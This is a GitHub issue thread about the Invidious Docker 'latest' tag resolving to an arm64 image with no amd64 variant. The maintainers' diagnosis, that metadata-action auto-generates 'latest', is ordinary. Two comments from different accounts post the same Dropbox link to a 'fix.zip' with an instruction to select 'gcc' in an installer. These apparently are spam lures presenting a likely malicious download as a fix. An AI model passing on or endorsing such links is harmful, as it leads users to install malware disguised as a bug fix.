### ISSUE TITLE
[Bug] latest docker image tag is now arm64 instead of amd64

### ISSUE THREAD

**Issue by Drikanis** [iv-org/invidious#4880]
**Describe the bug**

Latest image tag in quay.io has been replaced with the arm64 build instead of the amd64 one.

There is now no longer any valid latest tag for amd64.

**Steps to Reproduce**

https://quay.io/repository/invidious/invidious?tab=tags&tag=latest

```
skopeo inspect docker://quay.io/invidious/invidious:latest
FATA[0000] Error parsing manifest for image: choosing image instance: no image found in image index for architecture amd64, variant "", OS linux
```

**Logs**

**Screenshots**

![image](https://github.com/user-attachments/assets/ed12e997-0510-4f42-9782-8d786dd30d7b)
![image](https://github.com/user-attachments/assets/d579b71d-0763-4865-8f29-99fbbecdf574)

**Additional context**

**Comment by Wanderx13** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by IvanJrX** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by syeopite** [comment]
We are aware of the problem and are working on fixing it

**Comment by SamantazFox** [comment]
I found why it wasn't working:
https://github.com/docker/metadata-action?tab=readme-ov-file#latest-tag

When using `type=semver`, `docker/metadata-action` auto-generates the `latest` tag. We need to add `latest=false` under `flavor`
